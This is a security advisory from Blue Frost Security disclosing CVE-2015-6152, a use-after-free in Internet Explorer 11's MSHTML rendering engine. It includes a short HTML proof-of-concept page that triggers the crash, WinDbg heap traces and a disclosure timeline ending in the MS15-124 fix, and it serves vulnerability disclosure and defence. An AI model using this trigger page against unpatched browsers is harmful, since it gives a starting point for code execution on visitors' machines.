IE11 CObjectElement Use-After-Free Vulnerability

A use-after-free vulnerability was identified which allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer.

Vendor  Microsoft, http://www.microsoft.com 
Affected Products  Internet Explorer
Affected Versions  IE 11
CVE-ID  CVE-2015-6152 
Severity  High 
Author  Moritz Jodeit (@moritzj), Blue Frost Security GmbH 

I. Impact

This vulnerability allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

II. Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:

<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<style>
    small{ -ms-block-progression: lr; -ms-filter: "vv"; }
</style>
<script>
    function trigger() { document.execCommand("JustifyLeft"); }
</script>
<nolayer>blue<small>frost</small>
<applet><tt>security</applet>
<script>trigger();</script>
</html>

With page heap enabled and the Memory Protect feature turned off, visiting that page results in the following crash:

(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f7402400000300  test    dword ptr [eax+24h],30000h ds:002b:09b09eb4=????????

0:007> !heap -p -a @eax
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    9b01f04:          9b09000             2000
    748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
    77e1ae8a ntdll!RtlpFreeHeap+0x0000005d
    77dc2b65 ntdll!RtlFreeHeap+0x00000142
    758814ad kernel32!HeapFree+0x00000014
    6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
    6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
    6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b 

We can see that a freed CObjectElement object is accessed in the MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the memory just before the CObjectElement destructor is called, we can see where the object was initially allocated.

0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 9b01f04:          9b09e90              170 -          9b09000             2000
          MSHTML!CObjectElement::`vftable'
    74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77e6134e ntdll!RtlDebugAllocateHeap+0x00000030
    77e1b16e ntdll!RtlpAllocateHeap+0x000000c4
    77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a
    6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017
    6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8
    6df17172 MSHTML!CHtmParse::ParseToken+0x00000096
    6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7
    6dd8341b MSHTML!CHtmPost::Exec+0x00000207
    6da308a8 MSHTML!CHtmPost::Run+0x0000003d
    6da3080e MSHTML!PostManExecute+0x00000061
    6da2727c MSHTML!PostManResume+0x0000007b
    6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b 

III. Mitigation

The issue was fixed in MS15-124 which should be installed to resolve the issue.

2015-08-04  Vulnerability reported to secure@microsoft com 
2015-09-24  Microsoft confirms that they successufully reproduced the issue 
2015-12-08  Microsoft resolves issue in MS15-124

 

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact research@bluefrostsecurity.de for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall Blue Frost Security be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Blue Frost Security has been advised of the possibility of such damages.

Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply.